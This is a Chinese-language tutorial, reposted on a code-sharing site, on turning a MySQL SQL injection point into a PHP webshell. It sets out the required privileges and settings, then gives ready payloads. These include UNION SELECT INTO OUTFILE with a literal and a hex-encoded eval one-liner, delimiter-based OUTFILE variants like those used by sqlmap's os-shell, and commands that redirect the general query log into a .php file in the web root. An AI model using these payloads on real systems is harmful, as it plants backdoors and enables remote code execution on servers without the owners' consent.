ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 数据库> 文章详细

MySQL注入点写入webshell

2020-12-07 14:33:03  阅读:288  来源: 互联网

标签:webshell secure 路径 写入 file MySQL select priv


MySQL注入点写入webshell

  • 条件

    • MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。

      • 通过命令查看secure-file-priv`的当前值,确认是否允许导入导出以及到处文件路径。
        show variables like ‘%secure_file_priv%’;
      • secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
      • 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
      • 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制,即secure_file_priv=""

    • MySQL的当前用户拥有的权限可以执行 select into outfile操作。

    • 当secure_file_priv文件导出路径与web目录路径重叠,写入Webshell才可以被访问到。

  • 注入方式
    • 利用Union select 写入
      • 具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径。
      • 执行语句 :
        ?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'
        ?id=1 union select 1,0x223c3f70687020406576616c28245f504f53545b2767275d293b3f3e22,3 into outfile "E:/study/WWW/evil.php"
    • 利用分隔符写入

      • 当Mysql注入点为盲注或报错,Union select写入的方式显然是利用不了的,那么可以通过分隔符写入。SQLMAP的 --os-shell命令,所采用的就是一下这种方式。

      • 具体权限要求:secure_file_priv支持web目录文件导出、数据库用户File权限、获取物理路径

      • 执行语句

        • ?id=1 INTO OUTFILE '物理路径' lines terminated by (一句话hex编码)#
        • ?id=1 INTO OUTFILE '物理路径' fields terminated by (一句话hex编码)#
        • ?id=1 INTO OUTFILE '物理路径' columns terminated by (一句话hex编码)#
          *?id=1 INTO OUTFILE '物理路径' lines starting by (一句话hex编码)#
    • 利用log写入
      • 新版本的MySQL设置了导出文件的路径,很难在获取Webshell过程中去修改配置文件,无法通过使用select into outfile来写入一句话。这时,我们可以通过修改MySQL的log文件来获取Webshell。
      • 具体权限要求:数据库用户需具备Super和File服务器权限、获取物理路径。
      • show variables like '%general%'; #查看配置
      • set global general_log = on; #开启general log模式
      • set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址
      • select '<?php eval($_GET[g]);?>' #写入shell
      • set global general_log=off; #关闭general log模式

标签:webshell,secure,路径,写入,file,MySQL,select,priv
来源: https://www.cnblogs.com/hacker-snail/p/14096955.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有